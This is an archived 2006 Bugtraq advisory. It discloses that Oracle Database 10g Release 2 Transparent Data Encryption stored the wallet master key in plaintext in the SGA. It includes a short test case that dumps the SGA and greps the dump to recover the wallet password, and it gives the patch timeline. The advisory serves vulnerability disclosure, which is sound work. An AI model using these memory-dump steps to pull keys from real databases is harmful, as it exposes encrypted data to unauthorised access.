lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060117220927.24724.qmail@securityfocus.com>
Date: 17 Jan 2006 22:09:27 -0000
From: ak@...-database-security.com
To: bugtraq@...urityfocus.com
Subject: Oracle Database 10g Rel. 2- Transparent Data Encryption plaintext
 masterkey in SGA


Transparent Data Encryption stores key unencrypted in the SGA

Name        Transparent Data Encryption stores key unencrypted in the SGA
Affected 	Oracle Database 10g Release 2
Severity 	High Risk
Category 	Information disclosure
Vendor URL 	http://www.oracle.com/
Author 	Alexander Kornbrust (ak at red-database-security.com)
Date 	      17 January 2005 (V 1.00)
Oracle Bug 	5802173
Time to fix 190 days


Details:
########
The Oracle security feature "Transparent Data Encryption" is storing the masterkey unencrypted in the SGA. A skilled attacker or non-security DBA can retrieve the plaintext masterkey.

Test case:
##########

SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";

System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 Production With the Partitioning, OLAP and Data Mining options


[oracle@...10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin

[oracle@...10201 /]$ cd /tmp

[oracle@...10201 /]$ dumpsga 

[oracle@...10201 /]$ strings * | grep -iH secretpassword 

secretpassword 
secretpassword 
secretpassword


[] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@ôçd$d$^@...cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0êd$d¤d$-

^@^@0êd$L4^L¿^Xp /¹]/º<8f>^Dsecretpassword^@...U^B^@èd$´4^Lfile:/oracle/10.2.0/admin/ora10201/wallet
[]


Patch Information:
##################
Oracle fixed this issue with the patches from the critical patch update january 2006 for Oracle 10g Release 2.

History:
########
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006 
(CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory



© 2006 by Red-Database-Security GmbH 
http://www.red-database-security.com/advisory/oracle_cpu_jan_2006.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ